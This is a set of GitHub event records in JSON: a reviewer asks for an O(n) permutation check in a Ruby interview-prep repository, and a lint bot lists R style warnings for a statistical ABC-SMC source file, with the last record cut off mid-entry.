{"id":"4580129093","type":"CommitCommentEvent","actor":{"login":"asaph"},"repo":{"name":"jasonsutter87/CtCI-6th-Edition-Ruby"},"payload":{"comment":{"id":19071104,"position":5,"line":5,"path":"Chap_1_Arrays_and_Strings/Q1_02_Check_Permutation.rb","commit_id":"ee98c27291e4222d70c7aad0e185550aa889c195","created_at":"2016-09-18T15:42:49Z","updated_at":"2016-09-18T15:42:49Z","body":"Sorting is O(n log n). Can you also provide a solution that runs in O(n)?"}},"created_at":"2016-09-18T15:42:49Z"}
{"id":"4580129142","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19071103,"position":null,"line":null,"path":null,"commit_id":"23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9","created_at":"2016-09-18T15:42:49Z","updated_at":"2016-09-18T15:42:49Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:8:40:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​    a <- sample(1:3, size = 1, prob = x-floor(x) )\n                                      ~^~\n```\n[R/ABC_SMC.R:9:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​    x2[a] <- x2[a]+1;\n                 ~^~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:45:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigM,\n                                            ^~~~\n```\n[R/ABC_SMC.R:23:29:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            dispVals, filtVals, compVals,\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:23:39:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            dispVals, filtVals, compVals,\n                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:23:49:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L23) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            dispVals, filtVals, compVals,\n                                                ^~~~~~~~\n```\n[R/ABC_SMC.R:24:29:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L24) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            numParticles, W)  {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:28:25:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L28) *style:* **Variable and function names should be all lowercase.**\n```r\n​  for (i in 1:seq_along(dispVals)) {\n                        ^~~~~~~~\n```\n[R/ABC_SMC.R:29:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n    ^~~~~\n```\n[R/ABC_SMC.R:29:16:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n               ^~~~~~~~\n```\n[R/ABC_SMC.R:29:29:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:29:42:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L29) *style:* **Variable and function names should be all lowercase.**\n```r\n​    prevP <- c(dispVals[i], filtVals[i], compVals[i])\n                                         ^~~~~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:31:50:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​    vals[i] <- W[i] * dnorm(diff, mean = 0, sd = sigM)\n                                                 ^~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:44:24:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​perturb <- function(p, sigM)  {\n                       ^~~~\n```\n[R/ABC_SMC.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    cat(\"Found previously finished run, loaded results from that run\\n\")\n^\n```\n[R/ABC_SMC.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    return(output);\n^\n```\n[R/ABC_SMC.R:49:34:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​  x <- sample(numbers, 3, replace=F)\n                                ~^~\n```\n[R/ABC_SMC.R:51:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​  oldVal <- params[x[1]]\n  ^~~~~~\n```\n[R/ABC_SMC.R:53:65:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​  params[x[1]] <- round(params [x[1]] + rnorm(1, mean = 0, sd = sigM), 0)\n                                                                ^~~~\n```\n[R/ABC_SMC.R:57:27:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L57) *style:* **Variable and function names should be all lowercase.**\n```r\n​  diff <- params [x[1]] - oldVal\n                          ^~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:72:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L72) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                   ^\n```\n[R/ABC_SMC.R:72:33:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L72) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                                ^\n```\n[R/ABC_SMC.R:72:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Rich <- (abs((rich - obs[,1])) / sd_vals[1])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:73:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                   ^\n```\n[R/ABC_SMC.R:73:33:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                                ^\n```\n[R/ABC_SMC.R:73:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Even <- (abs((even - obs[,2])) / sd_vals[2])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:74:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                   ^\n```\n[R/ABC_SMC.R:74:33:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                                ^\n```\n[R/ABC_SMC.R:74:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_Div  <- (abs((div -  obs[,3])) / sd_vals[3])^2;\n                                                 ~^~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  Fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord)  {\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:88:17:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:89:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:89:17:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:13:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:93:16:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:94:15:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:95:15:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:99:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:99:15:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:25:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:110:6:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L110) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(length(f) > 0)\n     ^\n```\n[R/ABC_SMC.R:111:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L111) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:117:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L117) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[,1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:117:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L117) *style:* **Commas should always have a space after.**\n```r\n​    dispVals <- d[,1]\n                   ^\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[,2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:118:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    filtVals <- d[,2]\n                   ^\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[,3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L119) *style:* **Commas should always have a space after.**\n```r\n​    compVals <- d[,3]\n                   ^\n```\n[R/ABC_SMC.R:120:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L120) *style:* **Commas should always have a space after.**\n```r\n​    fits <-     d[,8]\n                   ^\n```\n[R/ABC_SMC.R:121:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L121) *style:* **Commas should always have a space after.**\n```r\n​    weights <-  d[,9]\n                   ^\n```\n[R/ABC_SMC.R:124:11:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles,1] == numParticles)\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:24:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if (d[numParticles,1] == numParticles)\n                       ^\n```\n[R/ABC_SMC.R:124:30:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles,1] == numParticles)\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L125) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    {\n    ^\n```\n[R/ABC_SMC.R:126:35:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L126) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table( f[length(f)-1], header = F);\n                                 ~^~\n```\n[R/ABC_SMC.R:127:31:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L127) *style:* **Commas should always have a space after.**\n```r\n​      output <- list( DA = d[,1], HF = d[,2], LS = d[,3]);\n                              ^\n```\n[R/ABC_SMC.R:127:43:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L127) *style:* **Commas should always have a space after.**\n```r\n​      output <- list( DA = d[,1], HF = d[,2], LS = d[,3]);\n                                          ^\n```\n[R/ABC_SMC.R:127:55:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L127) *style:* **Commas should always have a space after.**\n```r\n​      output <- list( DA = d[,1], HF = d[,2], LS = d[,3]);\n                                                      ^\n```\n[R/ABC_SMC.R:136:3:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L136) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  {\n  ^\n```\n[R/ABC_SMC.R:144:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L145) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n^\n```\n[R/ABC_SMC.R:145:28:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:28:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L145) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:153:12:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L153) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:153:29:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L153) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L157) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:157:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L157) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L159) *style:* **lines should not be more than 80 characters.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L159) *warning:* **no visible global function definition for ‘getFromPrevious’**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:53:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:159:63:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                                                              